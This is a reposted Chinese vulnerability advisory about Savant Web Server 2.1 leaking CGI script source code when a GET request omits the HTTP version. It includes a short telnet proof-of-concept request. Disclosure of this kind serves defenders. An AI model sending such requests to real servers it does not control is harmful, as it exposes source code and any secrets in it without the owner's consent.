Savant Web Server CGI 源码泄露

2008-04-09 04:28:27来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Savant Web Server CGI 源码泄露

发布日期:2000-06-08
更新日期:2000-06-09

受影响系统:
Michael Lamont Savant WebServer 2.1
描述:

向一个CGI脚本提交GET请求的时候,如果省略了HTTP版本信息,Savant Web 服务
将泄露该脚本源代码。

<* 来源:Drew wizdumb@leet.org *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


$ telnet target 80

GET /cgi-bin/script.xyz HTTP/1.0
<正确的脚本执行输出>

GET /cgi-bin/script.xyz
<源代码泄露>


建议:

暂无

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Linux 内核Capabilities漏洞导致本地用户获取root权限

下一篇:ISDN4Linux ipppd 设备名本地格式串溢出漏洞